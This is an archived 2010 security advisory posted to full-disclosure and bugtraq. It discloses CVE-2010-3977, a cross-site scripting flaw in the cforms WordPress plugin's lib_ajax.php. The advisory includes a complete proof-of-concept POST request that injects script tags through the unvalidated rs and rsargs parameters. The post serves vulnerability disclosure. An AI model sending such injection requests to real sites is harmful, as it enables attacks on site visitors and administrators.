[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

cforms WordPress Plugin Cross Site Scripting Vulnerability - CVE-2010-3977

To: "full-disclosure@xxxxxxxxxxxxxxxxx" <full-disclosure@xxxxxxxxxxxxxxxxx>, "bugtraq@xxxxxxxxxxxxxxxxx" <bugtraq@xxxxxxxxxxxxxxxxx>
Subject: cforms WordPress Plugin Cross Site Scripting Vulnerability - CVE-2010-3977
From: Rodrigo Branco <rbranco@xxxxxxxxxxxxxx>
Date: Sat, 30 Oct 2010 08:13:48 -0700

Dear List,

I'm writing on behalf of the Check Point Vulnerability Discovery Team to 
publish the following vulnerability.



Check Point Software Technologies - Vulnerability Discovery Team (VDT)
http://www.checkpoint.com/defense/

cforms WordPress Plugin Cross Site Scripting Vulnerability
CVE-2010-3977


INTRODUCTION

According to Delicious Days, "cforms is a powerful and feature rich form plugin 
for WordPress, offering convenient deployment of multiple Ajax 
driven contact forms throughout your blog or even on the same page."

This problem was confirmed in the following versions of the cforms WordPress 
Plugin, other versions 
maybe also affected.

cforms v11.5


CVSS Scoring System

The CVSS score is: 5.5
        Base Score: 6.7
        Temporal Score: 5.5
We used the following values to calculate the scores:
        Base score is: AV:N/AC:L/Au:N/C:C/I:C/A:N
        Temporal score is: E:F/RL:OF/RC:C


DETAILS

A data array is created in lib_ajax.php using values from a form field in a 
POST request.  The parameters rs and rsargs are not validated and thus
it is possible to inject code.

Request:
http://<server>/wp-content/plugins/cforms/lib_ajax.php
POST /wp-content/plugins/cforms/lib_ajax.php HTTP/1.1
Host: <server>
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:
1.9.2.10) Gecko/20100914 Firefox/3.6.10
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 219
Cookie: wp-settings-1=m0%3Do%26m1%3Do%26m2%3Do%26m3%3Do%26m4%3Do%26m5%3Do
%26m6%3Do%26m7%3Do%26m8%3Do%26urlbutton%3Dnone%26editor%3Dtinymce
%26imgsize%3Dfull%26align%3Dcenter%26hidetb%3D1%26m9%3Dc%26m10%3Do
%26uploader%3D1%26m11%3Do; wp-settings-time-1=1285758765;
c o m m e n t _ a u t h o r _ 9 3 f 4 1 b a 0 b 1 6 f 3 4 6 7 6 f 8 0 2 0 5 8 e 
8 2 3 8 8 f 6 = t e s t  ;
comment_author_email_93f41ba0b16f34676f802058e82388f6=rbranco_nospam
%40checkpoint.com
Pragma: no-cache
Cache-Control: no-cache
rs=<script>alert(1)</script>&rst=&rsrnd=1287506634854&rsargs[]=1$#
$<script>alert(1)</script>$#$rbranco_nospam@xxxxxxxxxxxxxx$#$http://
www.checkpoint.com$#$<script>alert(1)</script>



CREDITS

This vulnerability has been brought to our attention by Wagner Elias from 
Conviso IT Security company (http://www.conviso.com.br) and researched 
internally by Rodrigo Rubira Branco from the Check Point Vulnerability 
Discovery Team (VDT).




Best Regards,
 
Rodrigo.
 
--
Rodrigo Rubira Branco
Senior Security Researcher
Vulnerability Discovery Team (VDT)
Check Point Software Technologies

Prev by Date: Adobe Shockwave Player Memory Corruption Vulnerability - CVE-2010-4086
Next by Date: Adobe Shockwave Player Memory Corruption Vulnerability - CVE-2010-4088
Previous by thread: Adobe Shockwave Player Memory Corruption Vulnerability - CVE-2010-4086
Next by thread: Adobe Shockwave Player Memory Corruption Vulnerability - CVE-2010-4088
Index(es):
- Date
- Thread